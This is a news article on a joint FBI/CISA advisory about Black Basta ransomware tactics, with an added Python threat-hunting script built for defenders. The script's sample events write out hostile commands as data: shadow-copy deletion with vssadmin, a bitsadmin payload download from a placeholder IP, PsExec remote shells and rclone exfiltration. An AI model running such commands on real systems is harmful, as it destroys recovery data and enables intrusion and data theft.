CISA advisory includes indicators of compromise and TTPs that can be used for threat hunting.

A ransomware-as-a-service operation known as Black Basta has grown into one of the most prolific cybercrime threats of the past two years, compromising more than 500 organizations around the world. Many of its victims have been healthcare providers and operators of critical infrastructure, according to the FBI.

“Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions,” the FBI, the US Cybersecurity and Infrastructure Security Agency, the Department of Health and Human Services and the Multi-State Information Sharing and Analysis Center (MS-ISAC) said in a joint advisory.

The advisory includes indicators of compromise (IoCs) and tactics, techniques and procedures (TTPs) associated with Black Basta that the FBI collected during its investigations and from third-party sources. Defenders can use this information for threat hunting and to build detections inside their networks; it is complemented by a series of mitigation recommendations from the authoring organizations.

How does Black Basta break into networks?

Like most modern ransomware operations, Black Basta runs on a service model: its creators and maintainers develop and improve the file-encrypting software and its supporting infrastructure, such as the victim negotiation site on the dark web and the public leak site. Targeting and infection are outsourced to external criminal contractors known as “affiliates”, who earn a considerable percentage of any ransom paid by the organizations they compromise. Because affiliates operate independently of each other, their initial access techniques vary, though there is some overlap.
The operation was launched in the spring of 2022 and was first spotted in April of that year. Security experts believe it was created by people formerly affiliated with the notorious and now-defunct Conti ransomware operation, which itself was associated with an even older one called REvil. It is common in the ransomware ecosystem for operations to shut down when they attract too much attention from law enforcement and then rebrand under other names.

Early on, Black Basta affiliates broke into organizations with spear-phishing emails that deployed a trojan or backdoor through malicious attachments or links. Spear phishing remains one of the most common ways to deploy malware and is used by nearly all cybercriminal gangs. Another method is to buy access from so-called initial access brokers or malware distribution platforms. One such platform is the long-running Qakbot (Qbot) botnet, which has been used by Black Basta and by Conti before it.

“Starting in February 2024, Black Basta affiliates began exploiting ConnectWise vulnerability CVE-2024-1709,” the FBI and its partners said in the joint advisory. “In some instances, affiliates have been observed abusing valid credentials.”

Black Basta’s goal is to gain admin credentials

After initial access, Black Basta affiliates deploy a variety of built-in system tools and dual-use programs to escalate privileges and move laterally to other systems, with the goal of compromising a domain controller and obtaining domain administrator credentials. Those credentials let them push the ransomware to as many computers on the network as possible using the usual Windows management tools and application deployment mechanisms.
Some of the tools the FBI saw Black Basta affiliates use include the SoftPerfect network scanner (netscan.exe) for network scanning, as well as reconnaissance tools with “Intel” or “Dell” in their names that are saved in the root of the C:\ drive. Mimikatz is used to extract credentials stored on Windows systems, and BITSAdmin and PsExec are used to execute commands and transfer files to other systems. RClone is used to exfiltrate data, and the Cobalt Strike beacon, a component of a commercial penetration testing tool, serves as a backdoor to maintain remote access. The Windows-native Remote Desktop Protocol (RDP), as well as commercial remote access tools such as Splashtop and ScreenConnect, have also been used to access compromised systems.

“Black Basta affiliates have also exploited ZeroLogon (CVE-2020-1472), NoPac (CVE-2021-42278 and CVE-2021-42287) and PrintNightmare (CVE-2021-34527) vulnerabilities for local and Windows Active Domain privilege escalation,” the advisory stated.

The attackers also use custom tools, including PowerShell scripts and a tool called Backstab, to disable endpoint detection and response (EDR) products before they start encrypting files. The Windows vssadmin.exe utility is used to delete Volume Shadow Copies that could otherwise be used to recover the encrypted files. Encrypted files get a .basta or random extension appended to their names, and a ransom note called readme.txt is dropped on the system to direct victims to a .onion site on the Tor network.

As with most modern ransomware operations, Black Basta engages in double extortion. The first lever is file encryption, which leaves victims unable to carry out normal business operations until they restore systems from external backups, a lengthy process; the second is the threat of leaking the exfiltrated sensitive business data publicly or selling it.
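A small hunt over process-creation telemetry, added here as an example that is not part of the advisory or of this article: it encodes the tooling named above (vssadmin shadow deletion, netscan.exe, Intel/Dell-named binaries in the drive root, BITSAdmin transfers, PsExec, RClone, Mimikatz) as rules and runs them over constructed Windows 4688/Sysmon-style events, then checks a file listing for the .basta extension and readme.txt note. The sample events, host names and IP address are made up, and the ATT&CK technique IDs attached to each rule are my own mapping to the public ATT&CK catalog, not the advisory's table.

```python
"""Hunt for the Black Basta tooling named above in process-creation events.
Added example for this page, not code from the advisory; the events below are
constructed to look like Windows 4688 / Sysmon Event ID 1 records."""
from __future__ import annotations

import re
from typing import Iterable

# Constructed sample events: "image" is the new process's full path and
# "cmdline" its command line, as a log collector would normalize them.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "ws01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows"},              # routine admin use
    {"host": "ws02", "image": r"C:\Intel.exe", "cmdline": "Intel.exe"},
    {"host": "ws02", "image": r"C:\Program Files\Intel\IntelTool.exe",
     "cmdline": "IntelTool.exe"},                          # legitimate vendor path
    {"host": "ws03", "image": r"C:\Tools\netscan.exe",
     "cmdline": "netscan.exe /range:10.0.0.0/24"},
    {"host": "ws03", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download http://203.0.113.5/x.exe C:\\ProgramData\\x.exe"},
    {"host": "dc01", "image": r"C:\Temp\PsExec.exe",
     "cmdline": r"PsExec.exe \\dc01 -s cmd.exe"},
    {"host": "fs01", "image": r"C:\Users\Public\rclone.exe",
     "cmdline": "rclone.exe copy D:\\Finance remote:bucket"},
    {"host": "fs01", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe readme.txt"},
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows (or mixed-separator) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _in_drive_root(path: str) -> bool:
    """True for C:\\Intel.exe, false for C:\\Program Files\\Intel\\IntelTool.exe."""
    return re.fullmatch(r"[A-Za-z]:\\[^\\]+", path) is not None


# (rule name, ATT&CK technique, predicate over one event). Technique IDs are
# this example's mapping, not the advisory's.
RULES = [
    ("vssadmin shadow copy deletion", "T1490",
     lambda e: _basename(e["image"]) == "vssadmin.exe"
     and re.search(r"delete\s+shadows", e["cmdline"], re.I)),
    ("SoftPerfect network scanner", "T1046",
     lambda e: _basename(e["image"]) == "netscan.exe"),
    ("Intel/Dell-named executable in drive root", "T1036",
     lambda e: _in_drive_root(e["image"])
     and re.search(r"intel|dell", _basename(e["image"]))),
    ("BITSAdmin file transfer", "T1197",
     lambda e: _basename(e["image"]) == "bitsadmin.exe"
     and "/transfer" in e["cmdline"].lower()),
    ("PsExec remote execution", "T1569.002",
     lambda e: _basename(e["image"]) in {"psexec.exe", "psexec64.exe", "psexesvc.exe"}),
    ("RClone exfiltration", "T1567.002",
     lambda e: _basename(e["image"]) == "rclone.exe"),
    ("Mimikatz credential dumping", "T1003.001",
     lambda e: _basename(e["image"]) == "mimikatz.exe"
     or "sekurlsa::" in e["cmdline"].lower()),
]


def hunt(events: Iterable[dict]) -> list[dict]:
    """Return one hit per (event, rule) match; benign events produce nothing."""
    hits = []
    for e in events:
        for name, technique, pred in RULES:
            if bool(pred(e)):
                hits.append({"host": e["host"], "rule": name,
                             "technique": technique, "cmdline": e["cmdline"]})
    return hits


def ransomware_artifacts(paths: Iterable[str]) -> dict[str, list[str]]:
    """Flag encrypted files (.basta) and ransom notes (readme.txt) in a listing.
    The malware may also use a random extension, so no .basta hit is not a
    clean bill of health; the note name is the more stable indicator."""
    found = {"encrypted": [], "notes": []}
    for p in paths:
        name = _basename(p)
        if name.endswith(".basta"):
            found["encrypted"].append(p)
        elif name == "readme.txt":
            found["notes"].append(p)
    return found


if __name__ == "__main__":
    for h in hunt(SAMPLE_EVENTS):
        print(f'{h["host"]:5} {h["technique"]:10} {h["rule"]}: {h["cmdline"]}')
```

These are name-based rules and therefore brittle: affiliates can rename netscan.exe or rclone.exe, so treat hits as hunting leads to enrich with parent process, user and timing rather than as blocking signatures. The vssadmin rule deliberately ignores "list shadows" so that routine administration does not page anyone.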
Black Basta mitigation guides

The joint cybersecurity advisory includes mitigations developed by CISA and the National Institute of Standards and Technology (NIST), as well as links to best practices and mitigation guides specific to organizations in the health sector. These cover asset management and security, access control management, email security and phishing prevention, vulnerability management and assessment, and more.

The advisory also recommends that organizations test and validate their security defenses against the Black Basta TTPs it describes, which are mapped to the MITRE ATT&CK framework:

1. Select an ATT&CK technique described in the advisory.
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a comprehensive set of performance data.
6. Tune your security program, including people, processes and technologies, based on the data generated by this process.